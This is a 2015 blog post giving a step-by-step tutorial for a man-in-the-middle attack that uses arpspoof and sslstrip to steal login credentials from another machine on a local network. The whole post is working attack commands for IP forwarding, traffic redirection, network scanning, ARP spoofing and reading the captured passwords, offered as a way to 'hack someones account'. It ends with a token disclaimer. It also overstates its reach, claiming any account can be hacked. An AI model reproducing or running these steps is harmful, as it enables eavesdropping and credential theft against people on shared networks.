Thursday 9 April 2015

MAN-IN-THE-MIDDLE ATTACK

Hey guys, today I am going to show you man-in-the-middle attack (MITMA). This is the best method to hack someones account. You can hack any accounts like GOOGLE, FACEBOOK,TWITTER, YAHOO, etc.. Even if that is secured you can Hack easily.  

REQUIRENMENT:

1. Kali Linux (I am using Kali Linux 1.1.0 )
2. Internet connection.

I am just going to Hack one of my friend's particular system. You guys can see google, Facebook and other social networking websites are "https://". It means website more secure.
Now i am going to Attack that system by using sslstrip.

Step 1: Open Kali Linux and Open terminal by right clicking mouse.
  And search IP address of the Host machine.
"ifconfig"
Mine is 192.168.0.105.


Now you can get an idea what I am going to do.



Open the terminal and type the following commands. I am going to forward the IP.
Type

"echo 1 > /proc/sys/net/ipv4/ip_forward"
You can see the picture below and follow the commands.

"iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080".


Now check the Default gateway of the network. We are going to Attack the Default gateway and steal data. My default Gateway is 192.168.0.1.
"route -n"


Now check what are the Device Networks are available by scanning network.
Using nmap, it scans the entire network and gives the open ports of that each and every network. Type this command

"nmap -sS -O 192.168.0.1/24 "
I am going to Attack victim machine 192.168.0.102.





Now type the following commands without any mistake.

arpspoof -i eth0 -t <Victim IP>  <Default gateway> )

"arpspoof -i eth0 -t 192.168.0.102 192.168.0.1"





The package is Loading and Open a new terminal and type
 I am using port number 8080.

"sslstrip -l 8080"

It's done guys. We hacked successfully.
If the victim did anything, it will show on your window. Let's see some examples.
All the secure networks are now unsecured. "https://" are converted into "http://". You can see.
Type cat for reading the file and type log file name.
Type the following commands

"cat sslstrip.log"





We got the username and password.
And also see one more example.
By hacking Google.


You can see all the secured websites are now unsecured.
(http://)


That's it guys.
Enjoy!!

This only for Educational purpose. I am not responsible for
 any of the illegal activities.

No comments:

Post a Comment